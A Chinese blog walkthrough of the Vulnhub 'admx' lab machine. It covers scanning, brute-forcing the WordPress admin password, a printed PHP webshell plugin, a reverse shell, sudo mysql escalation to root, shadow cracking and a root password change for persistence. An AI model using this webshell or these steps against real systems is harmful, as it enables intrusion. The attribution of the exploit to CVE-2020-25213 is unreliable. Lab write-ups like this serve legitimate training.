当前位置: 首页 > article >正文

Vulnhub打靶-admx-new

article 2024/10/19 4:22:11

基本信息

靶机下载:https://pan.baidu.com/s/1n__Xi5zpDxtNvuR_Be-2Dg?pwd=76wa 提取码: 76wa

攻击机器:192.168.20.128(Windows操作系统)

靶机:192.168.20.0/24

目标:获取2个flag+root权限

本次靶机难度较为简单,不涉及内网穿透等内容,是我第一次尝试红队攻击,故在此记录

具体流程

信息收集

首先我们拿到一个靶机,第一个要做的事情就是进行信息收集,看看靶机是否开放了某些具有漏洞的服务可以让我们进行渗透,由于靶机是部署在我虚拟机下的,所以我可以通过我的攻击机器知道靶机的网段是192.168.20.0/24,所以我们首先使用nmap扫描网段下存活的所有主机

执行命令nmap -sn 192.168.20.0/24

image-20241015140918503

192.168.20.1是我自己主机的IP地址,192.168.20.2是网关出口,192.168.20.128是我的攻击主机,所以这里存疑的只有192.168.20.132以及192.168.20.254,所以我们直接扫描这两个IP地址开放的端口来进行进一步确认

执行命令nmap 192.168.20.132 192.168.20.254

34d4c7430684f506686fb27ca4180e4e

我们可以进一步确定我们靶机的IP是192.168.20.132,且开放了80端口作为web服务,我们接着利用浏览器访问其80端口,看看能不能发现什么

image-20241015141853169

这一看就是要进行路径扫描,我们直接使用diresearch进行路径扫描,执行命令python dirsearch.py -u http://192.168.20.132/,如下所示

image-20241015142508268

我们发现有wordpress的登录后台,我们尝试访问即可,访问界面如下所示

image-20241015142651027

一开始我以为是我虚拟机的浏览器禁用了js,后来换成我主机的浏览器进行访问,发现还是这个样子,我接下来查看我浏览器配置的插件发现了关键信息,如下图所示

image-20241015142940386

我的findsomething插件显示的当前页面的IP地址为192.168.159.145,这显然和web页面的真实IP地址不一样,所以这里肯定是进行了IP替换,我们要通过bp进行代理,来重新更换回来,如下所示

43a9b48e13fffd4e50fb14edb7690eb3

我们在BP中进行如下设置之后,把浏览器的代理切换为BP进行代理,然后我们再尝试访问,如下所示

image-20241015143459459

我们可以发现页面访问正常,说明我们成功绕过了第一个限制

后台密码爆破

渗透思路很清晰,我们能够成功访问到后台登录界面,现在唯一要做的就是爆破出登录的账号密码进行登录即可,这个时候就要体现出字典的强大性了,由于刚刚后台路径扫描的过程中出现了 /tools/adminer.php,所以我们不妨猜测账号为admin,爆破页面如下所示

image-20241015145142744

35afb990a93fe7c2acb4dc02bc3ce881

我们发现这里有唯一一个状态码是重定向的,所以这个密码应该是正确的,所以密码为adam14,我们尝试登录,发现可以登录上去

image-20241015144824442

漏洞利用

首先我们可以看到wordpress的版本号,wordpress的版本号为6.6.2,我们尝试搜索其历史漏洞。看看是否爆出过历史漏洞,我们发现存在CVE-2020-25213远程代码执行的漏洞,所以我们尝试上传PHP脚本以进行任意命令执行,其中我们的后门代码如下所示

<?php

/**

 * Plugin Name:Webshell

 * Plugin URI:https//borgeous.github.io

 * Description:WP Webshell for Pentest

 * Version:1.0

 * Author:borgeous

 * Author URI:https://borgeous.github.io

 * License:https://borgeosus.github.io

 */

if(isset($_GET['pass']))

    {

	    system($_GET['pass']);

    }

?>

这里要注意的是,一定不能缺少上面的说明部分,这是wordpress插件的固定格式,且要压缩成zip文件包进行上传

image-20241015151347533

我们在激活插件后尝试访问如下地址

http://192.168.20.132/wordpress/wp-content/plugins/shell.php?pass=whoami

image-20241015152021795

我们发现可以成功执行任意命令

反弹shell

既然可以成功执行任意命令,那么接下来就是进行反弹shell拿主机命令执行权限

首先我们运行主机的nc进行监听9001端口

image-20241015152424490

紧接着我们用fantanshell生成器进行生成fantanshell,因为绝大部分靶机都有python环境,所以我们尝试使用python来进行反弹shell,如下所示

image-20241015152814279

我们将该命令进行执行,如下所示

image-20241015152907881

我们发现靶机已经成功上线,成功获取权限,我们此时切换到家目录,我们发现存在wpadmin用户,我们进入wpadmin用户,可以发现存在local.txt文件,我们尝试读取,但是发现权限不够,所以我们尝试切换wpadmin用户,密码试着使用adam14,发现成功进去,并成功获取第一个flag值

image-20241015154723460

image-20241015154927110

flag{Ava}

mysql提权

我们首先执行sudo -l命令列出当前用户在使用sudo命令时可以执行的命令列表

image-20241015160046825

我们发现用户wpadmin可以无需输入密码(NOPASSWD)以root用户的权限执行/usr/bin/mysql命令,连接到名为wordpress的数据库,我们尝试执行即可

image-20241015160253986

需要数据库密码,我们尝试密码复用,因为在真实环境中,会出现很多密码复用的情况,所以我们依然尝试adam14

image-20241015161935661

我们可以发现成功进入,然后我们利用mysqlsystem命令来帮助我们直接以root身份执行系统命令(\ !mysql命令中system的简写)。然后我们直接利用 \!来使用 /bin/bash命令以 root的身份来使用 shell

image-20241015162510800

成功获得root权限,且获得第二个flag

image-20241015162619737

image-20241015162715907

flag{Adam}

至此全部解决,我们可以尝试爆破root的密码,因为我们已经拿到了root权限,所以可以访问shadow文件,我们尝试使用john进行爆破

image-20241015163928669

发现密码本中没有该root密码,我们尝试修改root密码以维持权限

image-20241015164026156

成功拿到主机权限

image-20241015164057959


http://www.kler.cn/news/355365.html

相关文章:

  • JavaWeb合集08-项目开发实战
  • 1022. 宠物小精灵之收服
  • mysql数据同步ES方案---Canal
  • Mybatis中的映射文件编写原则
  • ssh远程打开图形化程序
  • 【Linux】Anaconda下载安装配置Pytorch安装配置(保姆级)
  • ROS理论与实践学习笔记——6 ROS机器人导航(仿真)
  • 软件安全开发生命周期(Software Security Development Lifecycle, SSDLC)模型
  • 逍遥安卓模拟器命令行合集(memuc命令)
  • JsonElement 类
  • ES 全文检索完全匹配高亮查询
  • 云贝教育 |【技术文章】OpenTenBase_V2.6基于麒麟V10源码编译安装
  • leetcode动态规划(六)-不同路径(有障碍物)
  • Java学习Day25:基础篇15:反射
  • MuSig2(一种多签名方案,具有签名聚合的特性
  • Python近红外光谱数据分析技术
  • IPv6 DNS简介
  • 一种用于机械手自适应抓取控制的紧凑型指尖形视触觉传感器
  • 【银行科技岗】相关考试知识点总结及部分考题
  • 学习的文档10/14